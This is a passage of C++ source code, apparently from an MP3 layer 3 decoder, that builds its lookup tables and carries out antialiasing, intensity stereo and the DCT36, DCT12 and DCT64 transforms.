static uint8* tables[] = { group3tab, group5tab, group9tab };
for (int i = 0; i < 3; ++i)
{
uint8* table = tables[i];
const int len = tableLengths[i];
for (int j = 0; j < len; ++j)
for (int k = 0; k < len; ++k)
for (int l = 0; l < len; ++l)
{
*table++ = base[i][l];
*table++ = base[i][k];
*table++ = base[i][j];
}
}
for (int k = 0; k < 27; ++k)
{
static constexpr double multipliers[] =
{
0, -2.0 / 3.0, 2.0 / 3.0, 2.0 / 7.0, 2.0 / 15.0, 2.0 / 31.0, 2.0 / 63.0, 2.0 / 127.0, 2.0 / 255.0,
2.0 / 511.0, 2.0 / 1023.0, 2.0 / 2047.0, 2.0 / 4095.0, 2.0 / 8191.0, 2.0 / 16383.0, 2.0 / 32767.0, 2.0 / 65535.0,
-4.0 / 5.0, -2.0 / 5.0, 2.0 / 5.0, 4.0 / 5.0, -8.0 / 9.0, -4.0 / 9.0, -2.0 / 9.0, 2.0 / 9.0, 4.0 / 9.0, 8.0 / 9.0
};
float* table = muls[k];
for (int j = 3, i = 0; i < 63; ++i, --j)
*table++ = (float) (multipliers[k] * std::pow (2.0, j / 3.0));
*table++ = 0;
}
}
void initLayer3Tables()
{
int i, j;
for (i = -256; i < 118 + 4; ++i)
powToGains[i + 256] = (float) std::pow (2.0, -0.25 * (i + 210));
for (i = 0; i < 8207; ++i)
nToThe4Over3[i] = (float) std::pow ((double) i, 4.0 / 3.0);
for (i = 0; i < 8; ++i)
{
static constexpr double Ci[] = { -0.6, -0.535, -0.33, -0.185, -0.095, -0.041, -0.0142, -0.0037 };
const double sq = sqrt (1.0 + Ci[i] * Ci[i]);
antiAliasingCs[i] = (float) (1.0 / sq);
antiAliasingCa[i] = (float) (Ci[i] / sq);
}
for (i = 0; i < 18; ++i)
{
win[0][i] = win[1][i] = (float) (0.5 * std::sin (MathConstants<double>::pi / 72.0 * (2 * i + 1)) / std::cos (MathConstants<double>::pi * (2 * i + 19) / 72.0));
win[0][i + 18] = win[3][i + 18] = (float) (0.5 * std::sin (MathConstants<double>::pi / 72.0 * (2 * (i + 18) + 1)) / std::cos (MathConstants<double>::pi * (2 * (i + 18) + 19) / 72.0));
}
const double piOver72 = MathConstants<double>::pi / 72.0;
for (i = 0; i < 6; ++i)
{
win[1][i + 18] = (float) (0.5 / std::cos (piOver72 * (2 * (i + 18) + 19)));
win[3][i + 12] = (float) (0.5 / std::cos (piOver72 * (2 * (i + 12) + 19)));
win[1][i + 24] = (float) (0.5 * std::sin (MathConstants<double>::pi / 24.0 * (2 * i + 13)) / std::cos (piOver72 * (2 * (i + 24) + 19)));
win[1][i + 30] = win[3][i] = 0;
win[3][i + 6] = (float) (0.5 * std::sin (MathConstants<double>::pi / 24.0 * (2 * i + 1)) / std::cos (piOver72 * (2 * (i + 6) + 19)));
}
for (i = 0; i < 12; ++i)
win[2][i] = (float) (0.5 * std::sin (MathConstants<double>::pi / 24.0 * (2 * i + 1)) / std::cos (MathConstants<double>::pi * (2 * i + 7) / 24.0));
for (j = 0; j < 4; ++j)
{
static constexpr int len[4] = { 36, 36, 12, 36 };
for (i = 0; i < len[j]; i += 2) win1[j][i] = win[j][i];
for (i = 1; i < len[j]; i += 2) win1[j][i] = -win[j][i];
}
const double sqrt2 = 1.41421356237309504880168872420969808;
for (i = 0; i < 16; ++i)
{
const double t = std::tan (i * MathConstants<double>::pi / 12.0);
tan1_1[i] = (float) (t / (1.0 + t));
tan2_1[i] = (float) (1.0 / (1.0 + t));
tan1_2[i] = (float) (sqrt2 * t / (1.0 + t));
tan2_2[i] = (float) (sqrt2 / (1.0 + t));
for (j = 0; j < 2; ++j)
{
double p1 = 1.0, p2 = 1.0;
if (i > 0)
{
const double base = std::pow (2.0, -0.25 * (j + 1));
if (i & 1)
p1 = std::pow (base, (i + 1) * 0.5);
else
p2 = std::pow (base, i * 0.5);
}
pow1_1[j][i] = (float) p1;
pow2_1[j][i] = (float) p2;
pow1_2[j][i] = (float) (sqrt2 * p1);
pow2_2[j][i] = (float) (sqrt2 * p2);
}
}
for (j = 0; j < 9; ++j)
{
const BandInfoStruct& bi = bandInfo[j];
int cb;
int* mp = map[j][0] = mapbuf0[j];
const int16* bdf = bi.longDiff;
for (i = 0, cb = 0; cb < 8; ++cb, i += *bdf++)
{
*mp++ = (*bdf) >> 1;
*mp++ = i;
*mp++ = 3;
*mp++ = cb;
}
bdf = bi.shortDiff + 3;
for (cb = 3; cb < 13; ++cb)
{
const int l = (*bdf++) >> 1;
for (int lwin = 0; lwin < 3; ++lwin)
{
*mp++ = l;
*mp++ = i + lwin;
*mp++ = lwin;
*mp++ = cb;
}
i += 6 * l;
}
mapEnd[j][0] = mp;
mp = map[j][1] = mapbuf1[j];
bdf = bi.shortDiff;
for (i = 0, cb = 0; cb < 13; ++cb)
{
const int l = (*bdf++) >> 1;
for (int lwin = 0; lwin < 3; ++lwin)
{
*mp++ = l;
*mp++ = i + lwin;
*mp++ = lwin;
*mp++ = cb;
}
i += 6 * l;
}
mapEnd[j][1] = mp;
mp = map[j][2] = mapbuf2[j];
bdf = bi.longDiff;
for (cb = 0; cb < 22; ++cb)
{
*mp++ = (*bdf++) >> 1;
*mp++ = cb;
}
mapEnd[j][2] = mp;
}
for (j = 0; j < 9; ++j)
{
for (i = 0; i < 23; ++i) longLimit[j][i] = jmin (32, (bandInfo[j].longIndex[i] - 1 + 8) / 18 + 1);
for (i = 0; i < 14; ++i) shortLimit[j][i] = jmin (32, (bandInfo[j].shortIndex[i] - 1) / 18 + 1);
}
for (i = 0; i < 5; ++i)
for (j = 0; j < 6; ++j)
for (int k = 0; k < 6; ++k)
{
const int n = k + j * 6 + i * 36;
iLength2[n] = (unsigned int) (i | (j << 3) | (k << 6) | (3 << 12));
}
for (i = 0; i < 4; ++i)
for (j = 0; j < 4; ++j)
for (int k = 0; k < 4; ++k)
{
const int n = k + j * 4 + i * 16;
iLength2[n + 180] = (unsigned int) (i | (j << 3) | (k << 6) | (4 << 12));
}
for (i = 0; i < 4; ++i)
for (j = 0; j < 3; ++j)
{
const int n = j + i * 3;
iLength2[n + 244] = (unsigned int) (i | (j << 3) | (5 << 12));
nLength2[n + 500] = (unsigned int) (i | (j << 3) | (2 << 12) | (1 << 15));
}
for (i = 0; i < 5; ++i)
for (j = 0; j < 5; ++j)
for (int k = 0; k < 4; ++k)
for (int l = 0; l < 4; ++l)
{
const int n = l + k * 4 + j * 16 + i * 80;
nLength2[n] = (unsigned int) (i | (j << 3) | (k << 6) | (l << 9) | (0 << 12));
}
for (i = 0; i < 5; ++i)
for (j = 0; j < 5; ++j)
for (int k = 0; k < 4; ++k)
{
const int n = k + j * 4 + i * 20;
nLength2[n + 400] = (unsigned int) (i | (j << 3) | (k << 6) | (1 << 12));
}
}
};
static const Constants constants;
//==============================================================================
struct Layer3SideInfo
{
struct Info
{
void doAntialias (float xr[32][18]) const noexcept
{
float* xr1 = xr[1];
int sb;
if (blockType == 2)
{
if (mixedBlockFlag == 0)
return;
sb = 1;
}
else
sb = (int) maxb - 1;
for (; sb != 0; --sb, xr1 += 10)
{
auto* cs = constants.antiAliasingCs;
auto* ca = constants.antiAliasingCa;
auto* xr2 = xr1;
for (int ss = 7; ss >= 0; --ss)
{
const float bu = *--xr2, bd = *xr1;
*xr2 = (bu * *cs) - (bd * *ca);
*xr1++ = (bd * *cs++) + (bu * *ca++);
}
}
}
void doIStereo (float xrBuffer[2][32][18], const int* scaleFactors,
int sampleRate, bool msStereo, int lsf) const noexcept
{
float (*xr) [32 * 18] = (float (*) [32 * 18]) xrBuffer;
auto& bi = bandInfo[sampleRate];
const float* tabl1, *tabl2;
if (lsf != 0)
{
auto p = scaleFactorCompression & 1;
if (msStereo)
{
tabl1 = constants.pow1_2[p];
tabl2 = constants.pow2_2[p];
}
else
{
tabl1 = constants.pow1_1[p];
tabl2 = constants.pow2_1[p];
}
}
else
{
if (msStereo)
{
tabl1 = constants.tan1_2;
tabl2 = constants.tan2_2;
}
else
{
tabl1 = constants.tan1_1;
tabl2 = constants.tan2_1;
}
}
if (blockType == 2)
{
bool doL = mixedBlockFlag != 0;
for (uint32 lwin = 0; lwin < 3; ++lwin)
{
uint32 sfb = maxBand[lwin];
doL = doL && (sfb <= 3);
for (; sfb < 12; ++sfb)
{
auto p = scaleFactors[sfb * 3 + lwin - mixedBlockFlag];
if (p != 7)
{
auto t1 = tabl1[p];
auto t2 = tabl2[p];
int sb = bi.shortDiff[sfb];
auto index = (uint32) sb + lwin;
for (; sb > 0; --sb, index += 3)
{
float v = xr[0][index];
xr[0][index] = v * t1;
xr[1][index] = v * t2;
}
}
}
auto p = scaleFactors[11 * 3 + lwin - mixedBlockFlag];
if (p != 7)
{
auto t1 = tabl1[p];
auto t2 = tabl2[p];
int sb = bi.shortDiff[12];
auto index = (uint32) sb + lwin;
for (; sb > 0; --sb, index += 3)
{
float v = xr[0][index];
xr[0][index] = v * t1;
xr[1][index] = v * t2;
}
}
}
if (doL)
{
int index = bi.longIndex[maxBandl];
for (uint32 sfb = maxBandl; sfb < 8; ++sfb)
{
int sb = bi.longDiff[sfb];
auto p = scaleFactors[sfb];
if (p != 7)
{
auto t1 = tabl1[p];
auto t2 = tabl2[p];
for (; sb > 0; --sb, ++index)
{
float v = xr[0][index];
xr[0][index] = v * t1;
xr[1][index] = v * t2;
}
}
else
index += sb;
}
}
}
else
{
int index = bi.longIndex[maxBandl];
for (uint32 sfb = maxBandl; sfb < 21; ++sfb)
{
int sb = bi.longDiff[sfb];
auto p = scaleFactors[sfb];
if (p != 7)
{
auto t1 = tabl1[p];
auto t2 = tabl2[p];
for (; sb > 0; --sb, ++index)
{
const float v = xr[0][index];
xr[0][index] = v * t1;
xr[1][index] = v * t2;
}
}
else
index += sb;
}
auto p = scaleFactors[20];
if (p != 7)
{
auto t1 = tabl1[p], t2 = tabl2[p];
for (int sb = bi.longDiff[21]; sb > 0; --sb, ++index)
{
const float v = xr[0][index];
xr[0][index] = v * t1;
xr[1][index] = v * t2;
}
}
}
}
int scfsi;
uint32 part2_3Length, bigValues;
uint32 scaleFactorCompression, blockType, mixedBlockFlag;
uint32 tableSelect[3];
uint32 maxBand[3];
uint32 maxBandl, maxb, region1Start, region2Start;
uint32 preflag, scaleFactorScale, count1TableSelect;
const float* fullGain[3];
const float* pow2gain;
};
struct InfoPair { Info gr[2]; };
InfoPair ch[2];
uint32 mainDataStart, privateBits;
};
//==============================================================================
namespace DCT
{
enum { subBandLimit = 32 };
static constexpr float cos6_1 = 0.866025388f;
static constexpr float cos6_2 = 0.5f;
static constexpr float cos9[] = { 1.0f, 0.98480773f, 0.939692616f, 0.866025388f, 0.766044438f, 0.642787635f, 0.5f, 0.342020154f, 0.173648179f };
static constexpr float cos36[] = { 0.501909912f, 0.517638087f, 0.551688969f, 0.610387266f, 0.707106769f, 0.871723413f, 1.18310082f, 1.93185163f, 5.73685646f };
static constexpr float cos12[] = { 0.517638087f, 0.707106769f, 1.93185163f };
inline void dct36_0 (int v, float* ts, float* out1, float* out2, const float* wintab, float sum0, float sum1) noexcept
{
auto tmp = sum0 + sum1;
out2[9 + v] = tmp * wintab[27 + v];
out2[8 - v] = tmp * wintab[26 - v];
sum0 -= sum1;
ts[subBandLimit * (8 - v)] = out1[8 - v] + sum0 * wintab[8 - v];
ts[subBandLimit * (9 + v)] = out1[9 + v] + sum0 * wintab[9 + v];
}
inline void dct36_12 (int v1, int v2, float* ts, float* out1, float* out2, const float* wintab,
float tmp1a, float tmp1b, float tmp2a, float tmp2b) noexcept
{
dct36_0 (v1, ts, out1, out2, wintab, tmp1a + tmp2a, (tmp1b + tmp2b) * cos36[v1]);
dct36_0 (v2, ts, out1, out2, wintab, tmp2a - tmp1a, (tmp2b - tmp1b) * cos36[v2]);
}
static void dct36 (float* in, float* out1, float* out2, const float* wintab, float* ts) noexcept
{
in[17] += in[16]; in[16] += in[15]; in[15] += in[14]; in[14] += in[13]; in[13] += in[12];
in[12] += in[11]; in[11] += in[10]; in[10] += in[9]; in[9] += in[8]; in[8] += in[7];
in[7] += in[6]; in[6] += in[5]; in[5] += in[4]; in[4] += in[3]; in[3] += in[2];
in[2] += in[1]; in[1] += in[0]; in[17] += in[15]; in[15] += in[13]; in[13] += in[11];
in[11] += in[9]; in[9] += in[7]; in[7] += in[5]; in[5] += in[3]; in[3] += in[1];
auto ta33 = in[6] * cos9[3];
auto ta66 = in[12] * cos9[6];
auto tb33 = in[7] * cos9[3];
auto tb66 = in[13] * cos9[6];
dct36_12 (0, 8, ts, out1, out2, wintab,
in[2] * cos9[1] + ta33 + in[10] * cos9[5] + in[14] * cos9[7],
in[3] * cos9[1] + tb33 + in[11] * cos9[5] + in[15] * cos9[7],
in[0] + in[4] * cos9[2] + in[8] * cos9[4] + ta66 + in[16] * cos9[8],
in[1] + in[5] * cos9[2] + in[9] * cos9[4] + tb66 + in[17] * cos9[8]);
dct36_12 (1, 7, ts, out1, out2, wintab,
(in[2] - in[10] - in[14]) * cos9[3],
(in[3] - in[11] - in[15]) * cos9[3],
(in[4] - in[8] - in[16]) * cos9[6] - in[12] + in[0],
(in[5] - in[9] - in[17]) * cos9[6] - in[13] + in[1]);
dct36_12 (2, 6, ts, out1, out2, wintab,
in[2] * cos9[5] - ta33 - in[10] * cos9[7] + in[14] * cos9[1],
in[3] * cos9[5] - tb33 - in[11] * cos9[7] + in[15] * cos9[1],
in[0] - in[4] * cos9[8] - in[8] * cos9[2] + ta66 + in[16] * cos9[4],
in[1] - in[5] * cos9[8] - in[9] * cos9[2] + tb66 + in[17] * cos9[4]);
dct36_12 (3, 5, ts, out1, out2, wintab,
in[2] * cos9[7] - ta33 + in[10] * cos9[1] - in[14] * cos9[5],
in[3] * cos9[7] - tb33 + in[11] * cos9[1] - in[15] * cos9[5],
in[0] - in[4] * cos9[4] + in[8] * cos9[8] + ta66 - in[16] * cos9[2],
in[1] - in[5] * cos9[4] + in[9] * cos9[8] + tb66 - in[17] * cos9[2]);
dct36_0 (4, ts, out1, out2, wintab,
in[0] - in[4] + in[8] - in[12] + in[16],
(in[1] - in[5] + in[9] - in[13] + in[17]) * cos36[4]);
}
struct DCT12Inputs
{
float in0, in1, in2, in3, in4, in5;
inline DCT12Inputs (const float* in) noexcept
{
in5 = in[5 * 3] + (in4 = in[4 * 3]);
in4 += (in3 = in[3 * 3]);
in3 += (in2 = in[2 * 3]);
in2 += (in1 = in[1 * 3]);
in1 += (in0 = in[0 * 3]);
in5 += in3; in3 += in1;
in2 *= cos6_1;
in3 *= cos6_1;
}
inline void process() noexcept
{
in0 += in4 * cos6_2;
in4 = in0 + in2; in0 -= in2;
in1 += in5 * cos6_2;
in5 = (in1 + in3) * cos12[0];
in1 = (in1 - in3) * cos12[2];
in3 = in4 + in5; in4 -= in5;
in2 = in0 + in1; in0 -= in1;
}
};
static void dct12 (const float* in, float* out1, float* out2, const float* wi, float* ts) noexcept
{
{
ts[0] = out1[0];
ts[subBandLimit * 1] = out1[1];
ts[subBandLimit * 2] = out1[2];
ts[subBandLimit * 3] = out1[3];
ts[subBandLimit * 4] = out1[4];
ts[subBandLimit * 5] = out1[5];
DCT12Inputs inputs (in);
{
auto tmp1 = (inputs.in0 - inputs.in4);
auto tmp2 = (inputs.in1 - inputs.in5) * cos12[1];
auto tmp0 = tmp1 + tmp2;
tmp1 -= tmp2;
ts[16 * subBandLimit] = out1[16] + tmp0 * wi[10];
ts[13 * subBandLimit] = out1[13] + tmp0 * wi[7];
ts[7 * subBandLimit] = out1[7] + tmp1 * wi[1];
ts[10 * subBandLimit] = out1[10] + tmp1 * wi[4];
}
inputs.process();
ts[17 * subBandLimit] = out1[17] + inputs.in2 * wi[11];
ts[12 * subBandLimit] = out1[12] + inputs.in2 * wi[6];
ts[14 * subBandLimit] = out1[14] + inputs.in3 * wi[8];
ts[15 * subBandLimit] = out1[15] + inputs.in3 * wi[9];
ts[6 * subBandLimit] = out1[6] + inputs.in0 * wi[0];
ts[11 * subBandLimit] = out1[11] + inputs.in0 * wi[5];
ts[8 * subBandLimit] = out1[8] + inputs.in4 * wi[2];
ts[9 * subBandLimit] = out1[9] + inputs.in4 * wi[3];
}
{
DCT12Inputs inputs (++in);
auto tmp1 = (inputs.in0 - inputs.in4);
auto tmp2 = (inputs.in1 - inputs.in5) * cos12[1];
auto tmp0 = tmp1 + tmp2;
tmp1 -= tmp2;
out2[4] = tmp0 * wi[10];
out2[1] = tmp0 * wi[7];
ts[13 * subBandLimit] += tmp1 * wi[1];
ts[16 * subBandLimit] += tmp1 * wi[4];
inputs.process();
out2[5] = inputs.in2 * wi[11];
out2[0] = inputs.in2 * wi[6];
out2[2] = inputs.in3 * wi[8];
out2[3] = inputs.in3 * wi[9];
ts[12 * subBandLimit] += inputs.in0 * wi[0];
ts[17 * subBandLimit] += inputs.in0 * wi[5];
ts[14 * subBandLimit] += inputs.in4 * wi[2];
ts[15 * subBandLimit] += inputs.in4 * wi[5 - 2];
}
{
DCT12Inputs inputs (++in);
out2[12] = out2[13] = out2[14] = out2[15] = out2[16] = out2[17] = 0;
auto tmp1 = (inputs.in0 - inputs.in4);
auto tmp2 = (inputs.in1 - inputs.in5) * cos12[1];
auto tmp0 = tmp1 + tmp2;
tmp1 -= tmp2;
out2[10] = tmp0 * wi[10];
out2[7] = tmp0 * wi[7];
out2[1] += tmp1 * wi[1];
out2[4] += tmp1 * wi[4];
inputs.process();
out2[11] = inputs.in2 * wi[11];
out2[6] = inputs.in2 * wi[6];
out2[8] = inputs.in3 * wi[8];
out2[9] = inputs.in3 * wi[9];
out2[0] += inputs.in0 * wi[0];
out2[5] += inputs.in0 * wi[5];
out2[2] += inputs.in4 * wi[2];
out2[3] += inputs.in4 * wi[3];
}
}
static void dct64 (float* out0, float* out1, const float* samples) noexcept
{
float b1[32], b2[32];
{
auto* costab = constants.cosTables[0];
b1[0x00] = samples[0x00] + samples[0x1F]; b1[0x1F] = (samples[0x00] - samples[0x1F]) * costab[0x0];
b1[0x01] = samples[0x01] + samples[0x1E]; b1[0x1E] = (samples[0x01] - samples[0x1E]) * costab[0x1];
b1[0x02] = samples[0x02] + samples[0x1D]; b1[0x1D] = (samples[0x02] - samples[0x1D]) * costab[0x2];
b1[0x03] = samples[0x03] + samples[0x1C]; b1[0x1C] = (samples[0x03] - samples[0x1C]) * costab[0x3];
b1[0x04] = samples[0x04] + samples[0x1B]; b1[0x1B] = (samples[0x04] - samples[0x1B]) * costab[0x4];
b1[0x05] = samples[0x05] + samples[0x1A]; b1[0x1A] = (samples[0x05] - samples[0x1A]) * costab[0x5];
b1[0x06] = samples[0x06] + samples[0x19]; b1[0x19] = (samples[0x06] - samples[0x19]) * costab[0x6];
b1[0x07] = samples[0x07] + samples[0x18]; b1[0x18] = (samples[0x07] - samples[0x18]) * costab[0x7];
b1[0x08] = samples[0x08] + samples[0x17]; b1[0x17] = (samples[0x08] - samples[0x17]) * costab[0x8];
b1[0x09] = samples[0x09] + samples[0x16]; b1[0x16] = (samples[0x09] - samples[0x16]) * costab[0x9];
b1[0x0A] = samples[0x0A] + samples[0x15]; b1[0x15] = (samples[0x0A] - samples[0x15]) * costab[0xA];
b1[0x0B] = samples[0x0B] + samples[0x14]; b1[0x14] = (samples[0x0B] - samples[0x14]) * costab[0xB];
b1[0x0C] = samples[0x0C] + samples[0x13]; b1[0x13] = (samples[0x0C] - samples[0x13]) * costab[0xC];
b1[0x0D] = samples[0x0D] + samples[0x12]; b1[0x12] = (samples[0x0D] - samples[0x12]) * costab[0xD];
b1[0x0E] = samples[0x0E] + samples[0x11]; b1[0x11] = (samples[0x0E] - samples[0x11]) * costab[0xE];
b1[0x0F] = samples[0x0F] + samples[0x10]; b1[0x10] = (samples[0x0F] - samples[0x10]) * costab[0xF];
}
{
auto* costab = constants.cosTables[1];
b2[0x00] = b1[0x00] + b1[0x0F]; b2[0x0F] = (b1[0x00] - b1[0x0F]) * costab[0];
b2[0x01] = b1[0x01] + b1[0x0E]; b2[0x0E] = (b1[0x01] - b1[0x0E]) * costab[1];
b2[0x02] = b1[0x02] + b1[0x0D]; b2[0x0D] = (b1[0x02] - b1[0x0D]) * costab[2];
b2[0x03] = b1[0x03] + b1[0x0C]; b2[0x0C] = (b1[0x03] - b1[0x0C]) * costab[3];
b2[0x04] = b1[0x04] + b1[0x0B]; b2[0x0B] = (b1[0x04] - b1[0x0B]) * costab[4];
b2[0x05] = b1[0x05] + b1[0x0A]; b2[0x0A] = (b1[0x05] - b1[0x0A]) * costab[5];
b2[0x06] = b1[0x06] + b1[0x09]; b2[0x09] = (b1[0x06] - b1[0x09]) * costab[6];
b2[0x07] = b1[0x07] + b1[0x08]; b2[0x08] = (b1[0x07] - b1[0x08]) * costab[7];
b2[0x10] = b1[0x10] + b1[0x1F]; b2[0x1F] = (b1[0x1F] - b1[0x10]) * costab[0];
b2[0x11] = b1[0x11] + b1[0x1E]; b2[0x1E] = (b1[0x1E] - b1[0x11]) * costab[1];
b2[0x12] = b1[0x12] + b1[0x1D]; b2[0x1D] = (b1[0x1D] - b1[0x12]) * costab[2];
b2[0x13] = b1[0x13] + b1[0x1C]; b2[0x1C] = (b1[0x1C] - b1[0x13]) * costab[3];
b2[0x14] = b1[0x14] + b1[0x1B]; b2[0x1B] = (b1[0x1B] - b1[0x14]) * costab[4];
b2[0x15] = b1[0x15] + b1[0x1A]; b2[0x1A] = (b1[0x1A] - b1[0x15]) * costab[5];
b2[0x16] = b1[0x16] + b1[0x19]; b2[0x19] = (b1[0x19] - b1[0x16]) * costab[6];
b2[0x17] = b1[0x17] + b1[0x18]; b2[0x18] = (b1[0x18] - b1[0x17]) * costab[7];
}
{
auto* costab = constants.cosTables[2];
b1[0x00] = b2[0x00] + b2[0x07]; b1[0x07] = (b2[0x00] - b2[0x07]) * costab[0];
b1[0x01] = b2[0x01] + b2[0x06]; b1[0x06] = (b2[0x01] - b2[0x06]) * costab[1];
b1[0x02] = b2[0x02] + b2[0x05]; b1[0x05] = (b2[0x02] - b2[0x05]) * costab[2];
b1[0x03] = b2[0x03] + b2[0x04]; b1[0x04] = (b2[0x03] - b2[0x04]) * costab[3];
b1[0x08] = b2[0x08] + b2[0x0F]; b1[0x0F] = (b2[0x0F] - b2[0x08]) * costab[0];
b1[0x09] = b2[0x09] + b2[0x0E]; b1[0x0E] = (b2[0x0E] - b2[0x09]) * costab[1];
b1[0x0A] = b2[0x0A] + b2[0x0D]; b1[0x0D] = (b2[0x0D] - b2[0x0A]) * costab[2];
b1[0x0B] = b2[0x0B] + b2[0x0C]; b1[0x0C] = (b2[0x0C] - b2[0x0B]) * costab[3];
b1[0x10] = b2[0x10] + b2[0x17]; b1[0x17] = (b2[0x10] - b2[0x17]) * costab[0];
b1[0x11] = b2[0x11] + b2[0x16]; b1[0x16] = (b2[0x11] - b2[0x16]) * costab[1];
b1[0x12] = b2[0x12] + b2[0x15]; b1[0x15] = (b2[0x12] - b2[0x15]) * costab[2];
b1[0x13] = b2[0x13] + b2[0x14]; b1[0x14] = (b2[0x13] - b2[0x14]) * costab[3];
b1[0x18] = b2[0x18] + b2[0x1F]; b1[0x1F] = (b2[0x1F] - b2[0x18]) * costab[0];
b1[0x19] = b2[0x19] + b2[0x1E]; b1[0x1E] = (b2[0x1E] - b2[0x19]) * costab[1];
b1[0x1A] = b2[0x1A] + b2[0x1D]; b1[0x1D] = (b2[0x1D] - b2[0x1A]) * costab[2];
b1[0x1B] = b2[0x1B] + b2[0x1C]; b1[0x1C] = (b2[0x1C] - b2[0x1B]) * costab[3];
}
{
auto cos0 = constants.cosTables[3][0];
auto cos1 = constants.cosTables[3][1];
b2[0x00] = b1[0x00] + b1[0x03]; b2[0x03] = (b1[0x00] - b1[0x03]) * cos0;
b2[0x01] = b1[0x01] + b1[0x02]; b2[0x02] = (b1[0x01] - b1[0x02]) * cos1;
b2[0x04] = b1[0x04] + b1[0x07]; b2[0x07] = (b1[0x07] - b1[0x04]) * cos0;
b2[0x05] = b1[0x05] + b1[0x06]; b2[0x06] = (b1[0x06] - b1[0x05]) * cos1;
b2[0x08] = b1[0x08] + b1[0x0B]; b2[0x0B] = (b1[0x08] - b1[0x0B]) * cos0;
b2[0x09] = b1[0x09] + b1[0x0A]; b2[0x0A] = (b1[0x09] - b1[0x0A]) * cos1;
b2[0x0C] = b1[0x0C] + b1[0x0F]; b2[0x0F] = (b1[0x0F] - b1[0x0C]) * cos0;
b2[0x0D] = b1[0x0D] + b1[0x0E]; b2[0x0E] = (b1[0x0E] - b1[0x0D]) * cos1;
b2[0x10] = b1[0x10] + b1[0x13]; b2[0x13] = (b1[0x10] - b1[0x13]) * cos0;
b2[0x11] = b1[0x11] + b1[0x12]; b2[0x12] = (b1[0x11] - b1[0x12]) * cos1;
b2[0x14] = b1[0x14] + b1[0x17]; b2[0x17] = (b1[0x17] - b1[0x14]) * cos0;
b2[0x15] = b1[0x15] + b1[0x16]; b2[0x16] = (b1[0x16] - b1[0x15]) * cos1;
b2[0x18] = b1[0x18] + b1[0x1B]; b2[0x1B] = (b1[0x18] - b1[0x1B]) * cos0;
b2[0x19] = b1[0x19] + b1[0x1A]; b2[0x1A] = (b1[0x19] - b1[0x1A]) * cos1;
b2[0x1C] = b1[0x1C] + b1[0x1F]; b2[0x1F] = (b1[0x1F] - b1[0x1C]) * cos0;
b2[0x1D] = b1[0x1D] + b1[0x1E]; b2[0x1E] = (b1[0x1E] - b1[0x1D]) * cos1;
}
{
auto cos0 = constants.cosTables[4][0];
b1[0x00] = b2[0x00] + b2[0x01]; b1[0x01] = (b2[0x00] - b2[0x01]) * cos0;
b1[0x02] = b2[0x02] + b2[0x03]; b1[0x03] = (b2[0x03] - b2[0x02]) * cos0; b1[0x02] += b1[0x03];
b1[0x04] = b2[0x04] + b2[0x05]; b1[0x05] = (b2[0x04] - b2[0x05]) * cos0;
b1[0x06] = b2[0x06] + b2[0x07]; b1[0x07] = (b2[0x07] - b2[0x06]) * cos0;
b1[0x06] += b1[0x07]; b1[0x04] += b1[0x06]; b1[0x06] += b1[0x05]; b1[0x05] += b1[0x07];
b1[0x08] = b2[0x08] + b2[0x09]; b1[0x09] = (b2[0x08] - b2[0x09]) * cos0;
b1[0x0A] = b2[0x0A] + b2[0x0B]; b1[0x0B] = (b2[0x0B] - b2[0x0A]) * cos0; b1[0x0A] += b1[0x0B];
b1[0x0C] = b2[0x0C] + b2[0x0D]; b1[0x0D] = (b2[0x0C] - b2[0x0D]) * cos0;
b1[0x0E] = b2[0x0E] + b2[0x0F]; b1[0x0F] = (b2[0x0F] - b2[0x0E]) * cos0;
b1[0x0E] += b1[0x0F]; b1[0x0C] += b1[0x0E]; b1[0x0E] += b1[0x0D]; b1[0x0D] += b1[0x0F];
b1[0x10] = b2[0x10] + b2[0x11]; b1[0x11] = (b2[0x10] - b2[0x11]) * cos0;
b1[0x12] = b2[0x12] + b2[0x13]; b1[0x13] = (b2[0x13] - b2[0x12]) * cos0; b1[0x12] += b1[0x13];
b1[0x14] = b2[0x14] + b2[0x15]; b1[0x15] = (b2[0x14] - b2[0x15]) * cos0;
b1[0x16] = b2[0x16] + b2[0x17]; b1[0x17] = (b2[0x17] - b2[0x16]) * cos0;
b1[0x16] += b1[0x17]; b1[0x14] += b1[0x16]; b1[0x16] += b1[0x15]; b1[0x15] += b1[0x17];
b1[0x18] = b2[0x18] + b2[0x19]; b1[0x19] = (b2[0x18] - b2[0x19]) * cos0;
b1[0x1A] = b2[0x1A] + b2[0x1B]; b1[0x1B] = (b2[0x1B] - b2[0x1A]) * cos0; b1[0x1A] += b1[0x1B];
b1[0x1C] = b2[0x1C] + b2[0x1D]; b1[0x1D] = (b2[0x1C] - b2[0x1D]) * cos0;
b1[0x1E] = b2[0x1E] + b2[0x1F]; b1[0x1F] = (b2[0x1F] - b2[0x1E]) * cos0;
b1[0x1E] += b1[0x1F]; b1[0x1C] += b1[0x1E]; b1[0x1E] += b1[0x1D]; b1[0x1D] += b1[0x1F];
}
out0[0x10 * 16] = b1[0x00]; out0[0x10 * 12] = b1[0x04]; out0[0x10 * 8] = b1[0x02]; out0[0x10 * 4] = b1[0x06];
out0[0] = b1[0x01]; out1[0] = b1[0x01]; out1[0x10 * 4] = b1[0x05]; out1[0x10 * 8] = b1[0x03];
out1[0x10 * 12] = b1[0x07];
b1[0x08] += b1[0x0C]; out0[0x10 * 14] = b1[0x08]; b1[0x0C] += b1[0x0a]; out0[0x10 * 10] = b1[0x0C];
b1[0x0A] += b1[0x0E]; out0[0x10 * 6] = b1[0x0A]; b1[0x0E] += b1[0x09]; out0[0x10 * 2] = b1[0x0E];
b1[0x09] += b1[0x0D]; out1[0x10 * 2] = b1[0x09]; b1[0x0D] += b1[0x0B]; out1[0x10 * 6] = b1[0x0D];
b1[0x0B] += b1[0x0F]; out1[0x10 * 10] = b1[0x0B]; out1[0x10 * 14] = b1[0x0F];
b1[0x18] += b1[0x1C]; out0[0x10 * 15] = b1[0x10] + b1[0x18]; out0[0x10 * 13] = b1[0x18] + b1[0x14];
b1[0x1C] += b1[0x1a]; out0[0x10 * 11] = b1[0x14] + b1[0x1C]; out0[0x10 * 9] = b1[0x1C] + b1[0x12];
b1[0x1A] += b1[0x1E]; out0[0x10 * 7] = b1[0x12] + b1[0x1A]; out0[0x10 * 5] = b1[0x1A] + b1[0x16];
b1[0x1E] += b1[0x19]; out0[0x10 * 3] = b1[0x16] + b1[0x1E]; out0[0x10 * 1] = b1[0x1E] + b1[0x11];
b1[0x19] += b1[0x1D]; out1[0x10 * 1] = b1[0x11] + b1[0x19]; out1[0x10 * 3] = b1[0x19] + b1[0x15];
